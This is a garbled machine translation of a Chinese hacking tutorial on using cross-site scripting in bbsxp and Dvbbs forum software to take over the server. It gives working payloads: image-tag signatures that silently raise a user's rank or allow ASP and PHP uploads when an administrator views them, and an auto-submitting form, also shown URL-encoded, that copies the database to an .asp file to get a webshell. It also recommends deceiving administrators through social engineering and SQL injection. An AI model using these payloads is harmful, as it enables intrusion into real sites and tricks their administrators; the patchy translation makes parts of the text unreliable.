General Introduction
Simple description of what an XSS attack is
How to find an XSS vulnerability
General ideas for XSS attacks
Attacks from within:
How to find an internal XSS vulnerability
How to construct an attack
How to use
What instance of the attack, such as Dvbbs&bbsxp
Attacks from the outside
How to construct an XSS attack
How to deceive an administrator to open
How XSS and other technologies are linked
The combination with the MSSQL injection
QQ Cross Station's Knot what
The cross-station loophole of the domestic large statistic website
Social engineering
Make a scary Flash Trojan
The production method is written by Li Fengxian
Summarize
Body:
General Introduction to XSS
What is an XSS attack
XSS is also called CSS (Cross site script), cross-site scripting attacks. It refers to a malicious attacker who inserts malicious HTML code into a Web page, and when the user browses to the page, the HTML code embedded inside the Web is executed to achieve the special purpose of the malicious user. XSS is a passive attack because it is passive and difficult to exploit, so many people often call it harmful. This article is mainly about the use of XSS to get the target server shell. Although technology is the old technology, but its ideas hope to be helpful to everyone.
How to find an XSS vulnerability
Personally, I divide XSS attacks into two categories, one from an internal attack, and one that uses the program's own vulnerabilities to construct a cross station statement, such as a Dvbbs showerror.asp existence of a cross station vulnerability. The other is to come from an external attack, primarily by constructing an XSS cross-site vulnerability page or looking for a cross-site vulnerability other than a target. If we are going to infiltrate a site, we construct a Web page that has a cross-site vulnerability, and then construct a cross-site statement that deceives the administrator of the target server by combining other technologies, such as social engineering.
Then use the technology below to get a shell.
How to use
Traditional cross-station exploits typically involve an attacker building a cross-site Web page, then placing a cookie-collecting page in another space, and then combining other techniques to allow the user to open a Cross-site page to steal a user's cookie for further attack. Personally think this way too backward, for the drawbacks you may know, because even if you collect cookies you will not be able to penetrate further, most of the password inside the cookie is encrypted, if you want cookies to deceive, the same is subject to other conditions. The other way of thinking in this paper is to solve the above problems to some extent. For individuals, a more mature approach is to construct a form across the station, and the content of the form will have a high level of privilege to take advantage of the backup function of the program or the addition of the Administrator. I will introduce this technique in detail below.
Cross-station attacks from within
Looking for a cross-station vulnerability
If the code is better to do, we mainly look at the code in the user input to the place and the variable has not done the length and the "<", ">", ";", "" "" "and" "" whether the characters do filter. Also note that for the closure of the tag, such as testing QQ Group cross-Station vulnerability, you enter <script>alert (' Test ') in the title </script> The code is not executed because in the source code, there are other tags that are not closed, If a </script> is missing, at this time, you just close a </script> The code executes, such as: you enter </script><script>alert in the title (' Test ') </script>, so you can pop up a test box.
How to use
I first take bbsxp as an example, the process has been animated, the details are visible in the disc animation. Let me cite two of the more useful bbsxp in the case of the cross-station vulnerability.
A. Register an ordinary user first, I registered the user here is Linzi. Then we write in our personal signature:
[img]http://127.0.0.1/bbsxp/admin_user.asp?menu=userok&username=linzi&membercode=5&userlife=1& posttopic=3&money=9&postrevert=0&savemoney=0&deltopic=1®time=2005-9-1+1%3a1%3a1& EXPERIENCE=9&COUNTRY=%D6%D0%B9%FA&&SUBMIT=+%B8%FC+%D0%C2+[/IMG]
C. Then send a post, can be combined with other technology to deceive the administrator to browse post.
D. Because it is a test, so we log in as an administrator, and then open the post, we will find that Linzi has become a community district workers, as shown in figure
Besides, we just type in our personal signature.
[img]http://127.0.0.1/bbsxp/admin_setup.asp?menu=variableok&clubname=+&homename=+&homeurl=& Floor=2&posttime=3&timeout=6&onlinetime=12®10=10&style=1&selectup=fso&maxface= 10240&MAXPHOTO=30720&MAXFILE=102400&UPFILEGENRE=GIF|JPG|ASP%20|RAR[/IMG]
Also send a post, etc., as long as the administrator opened, will add an extension of ASP (with space) upload extension, this time, you just upload a newmm.asp (with space) can get a shell.
The attack above is somewhat limited, although the shell can be obtained, but the concealment is not very good, because the signature
is limited by length and cannot exceed 255 characters. We can combine flash across the station to achieve more covert
Attack, for the production of Flash Trojan, see the following brother Feng early introduction.
Re-use is as follows:
To modify the URL of the personal avatar, enter the following code: admin_setup.asp?menu=variableok&clubname=+&homename=+&homeurl=&floor=2 &posttime=3&timeout=6&onlinetime=12®10=10&style=1&selectup=fso&maxface=10240 &maxphoto=30720&maxfile=102400&upfilegenre=gif|jpg|php|rar
Then cheat the administrator to open your profile or browse through your posts, when the admin opens, it automatically adds a suffix to the PHP extension in the background, because bbsxp filters the spaces in the personal avatar URL, so we can only add other extensions that do not include spaces, and of course you can add a shtml extension, With it you can use it to view the source code and then attack further.
Iii. Cross-station attacks from outside
Sometimes, when we can't find a cross site that we can use for the target program, this time we can use to start from the outside, using what we want to take is the discussion of it, talking about the security of doing very well, but its message board there is a cross-station loophole, this time we can write in the message board of the cross-station statement, A cross-station statement is a statement that submits elevated permissions to the discourse in terms of form, such as the above Bbsxp plus ASP-extended statements. Of course, we can use back-end backup function to get a shell directly.
Example: First upload a file linzi.txt, the contents are as follows:
<body onload= "Javascript:document.forms[0].submit ()" ><form
action= "HTTP://127.0.0.1/BBSXP/ADMIN_FSO.ASP?MENU=BAKBF" method= "POST" ><input value= "Database/bbsxp.mdb" Name= "YL" ><input value= "database/shit.asp" name= "BF" ></body>
The above code is to talk about the database backup for shit.asp, the message board exists across the site as follows:
Http://127.0.0.1/bbsxp/page2.asp?username=
We construct the backup cross-station statement as follows:
http://127.0.0.1/bbsxp/page2.asp?username=%3C%62%6F%64%79%20%6F%6E%6C%6F%61%64%3D%22%6A%61%76%61%73%63%72%69% 70%74%3a%64%6f%63%75%6d%65%6e%74%2e%66%6f%72%6d%73%5b%30%5d%2e%73%75%62%6d%69%74%28%29%22%3e%3c%66%6f%72%6d%20 %61%63%74%69%6f%6e%3d%22%68%74%74%70%3a%2f%2f%31%32%37%2e%30%2e%30%2e%31%2f%62%62%73%78%70%2f%61%64%6d%69%6e% 5f%66%73%6f%2e%61%73%70%3f%6d%65%6e%75%3d%62%61%6b%62%66%22%20%6d%65%74%68%6f%64%3d%22%70%6f%73%74%22%3e%3c%69 %6e%70%75%74%20%76%61%6c%75%65%3d%22%64%61%74%61%62%61%73%65%2f%62%62%73%78%70%2e%6d%64%62%22%20%6e%61%6d%65% 3d%22%79%6c%22%20%3e%3c%69%6e%70%75%74%20%76%61%6c%75%65%3d%22%64%61%74%61%62%61%73%65%2f%73%68%69%74%2e%61%73 %70%22%20%6e%61%6d%65%3d%22%62%66%22%20%3e%3c%2f%62%6f%64%79%3e%3c%2f%68%74%6d%6c%3e
Or construct a cross station statement that uses an IFRAME to open a 0 size linzi.txt.
When the administrator opens, it automatically backs up to get a shell.
Iv. the end of XSS and other technologies
From the above example, we can know that how to cheat management open is a very important step, for deception to open, in addition to social engineering, we can combine other technologies, such as SQL injection. When we infiltrate a website, the main station MSSQL inject vulnerability, the permissions for public, This time we use the update to construct a cross-station statement, such as using an IFRAME to open a backup above to get the shell of the cross-station statement, and so on, we can in social engineering, the use of QQ other cross-station loopholes and so on.
Always for the deception is also an art, concrete how to use, we play their own imagination it!
Five, the production of Flash Trojan.
Slightly
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.